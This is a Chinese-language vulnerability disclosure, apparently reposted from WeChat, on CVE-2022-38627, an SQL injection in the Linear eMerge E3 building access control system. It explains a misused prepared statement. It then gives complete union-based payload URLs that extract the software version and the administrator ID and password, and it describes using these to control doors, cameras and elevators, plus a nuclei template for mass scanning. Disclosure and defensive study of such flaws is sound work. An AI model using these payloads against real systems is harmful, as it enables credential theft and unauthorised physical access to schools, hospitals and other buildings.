介绍:
在这项研究中,我将向您展示我是如何找到这个关键的 0day 漏洞的,它让我可以控制整个企业大楼管理系统(门、摄像头、电梯等……)除此之外,我还可以获取员工数据,并添加新的有权访问企业大楼的权限等。
实际上,在这项研究中,你会看到类似黑客电影场景的实施,但是这是一个真实的场景。
Linear eMerge E3系列产品概要:
Linear eMerge E3 系列是楼宇管理系统中行业领先的产品之一,因为它是行业中使用最广泛的产品之一,用于控制
-
学区和校园(K12 和高等教育)
-
企业园区
-
国外州/地方政府大楼(市政中心、市政厅、警察局、监狱等)
-
公共设施
-
交通(机场、地铁、巴士站)
-
礼拜场所(教堂、大型教堂)
-
医疗设施(医院、制药公司、生物实验室等)
-
和更多
让我们开始静态分析:
我遇到了这个接口 /badging/badge_template_print.php 所以让我们看一下代码
正如您所看到的,开发人员通过“idt”参数获取用户输入,然后使用 prepare 语句将其传递给查询,用预处理机制防止 SQL 注入
但是等一下,这里的预处理有一个错误的实现方式,要知道出了什么问题,我们需要先了解什么是(预处理工作流程)
预处理如何工作:
预处理处理工作流程经过 7 个阶段
为 SQL 查询处理准备语句阶段
只是它像这样将查询传递给数据库
$sth = $db->prepare(“SELECT * FROM “.dbtable.” where No = ?”);
因为问号被称为参数占位符
那么在准备好的语句下发生的是查询将通过 7 个阶段:
1- 解析阶段:解析语法错误和拼写错误检查以确保 SQL 查询的有效性
2- 语义检查阶段:数据库管理系统 (DBMS) 确定查询的有效性。指定的列和表是否存在?用户是否有权执行此查询?
3- 绑定阶段:数据库引擎检测占位符,并使用占位符编译查询。稍后将添加用户提供的数据(像这样的占位符替换阶段)。
$sth->bindValue(1, $id, PDO::PARAM_INT);
4- 查询优化 阶段: DBMS 选择执行查询的最佳算法。
5-缓存 阶段:最好的算法保存在缓存中,所以下次执行相同的查询时会跳过前四个阶段,直接跳转到占位符替换阶段
6- 占位符替换阶段:在此阶段,占位符被用户数据替换。但是,查询已经预编译(绑定),因此最终查询不会再次经过编译阶段。出于这个原因,用户提供的数据将始终被解释为一个简单的字符串,并且不能修改原始查询的逻辑。这使得查询将不受该数据的 SQL 注入漏洞的影响。
7- 执行阶段:
$sth->execute();
然后终于查询成功执行
这些是准备语句通过以防止 SQL 注入的阶段
那么让我们重新看看这里发生了什么
开发人员将来自用户的 $id 参数放入准备好的语句中,而不是像我上面描述的那样绑定值,所以如果用户输入参数是这样的
?id=1 UNION SELECT * FROM User
那么 $sth 变量值将是这样的
$db->prepare(“SELECT * FROM User where No=1 UNION SELECT * FROM User”)
因此准备好的语句会将我们的输入作为查询的一部分(不将其视为绑定值)并且用户输入将通过第一阶段的所有阶段传递,这意味着用户输入将被视为查询的一部分作为 SQL编译器会将其编译为查询的一部分,不会被视为绑定值,因为它是从第一阶段而不是第六阶段(占位符替换)传入查询的,这将导致 SQL注入成功
$xml 变量是通过使用参数“tpl”加载 XML 文件
第一个“if 语句”强制我们加载一个包含 <picture> 标记的 XML 文件,无论如何开发人员为此创建了这个 XML 文件“aa.xml”,所以我们需要做的只是将文件名放在“tpl”参数中。如tpl=aa.xml
我们需要将第二个“if 语句”设置为 false 来执行 else,它将在页面中打印“ImageFile”列以提取数据库内容
所以在我们的开发中,我们需要连接 ImageFile 列上的输出,因为这是提取数据库的可能方式
漏洞利用:
因为我已经访问了源代码和数据库,所以我知道 ImageFile 列是“User”表 39 列中的第 12 列
所以我们将使用基于联合的有效负载来利用它,因此我们需要连接第 12 列的输出并使用 NULL 值定义其他 38 列
/badging/badge_template_print.php?tpl=aa.xml&idt=1337 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,’ SWVersion:’||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from version
输出将是版本表中的软件版本,所以我将第 12 列的输出连接起来,这将使输出看起来像这样
SWVersion:<软件版本号>
如何提取admin密码
/badging/badge_template_print.php?tpl=aa.xml&idt=1337 union select NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,’ Admin-ID-is:’||id||’%20Admin-Password-is:’||password,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from controller
获得管理员密码后,我可以使用它们登录以从 Web 仪表板控制整个企业大楼
自动化:
为了检测漏洞,我制作了这个核心模板来扫描你的SRC列表或你的企业资产
您可以在我的Github库中找到它:
https://github.com/omarhashem123/Security-Research/tree/main/CVE-2022-38627
┌──(omar㉿kali)-[~]
└─$ nuclei -t CVE-2022–38627.yaml -l subdomains.txt
原文始发于微信公众号(军机故阁):CVE-2022-38627:Linear eMerge E3楼宇管理系统SQL注入
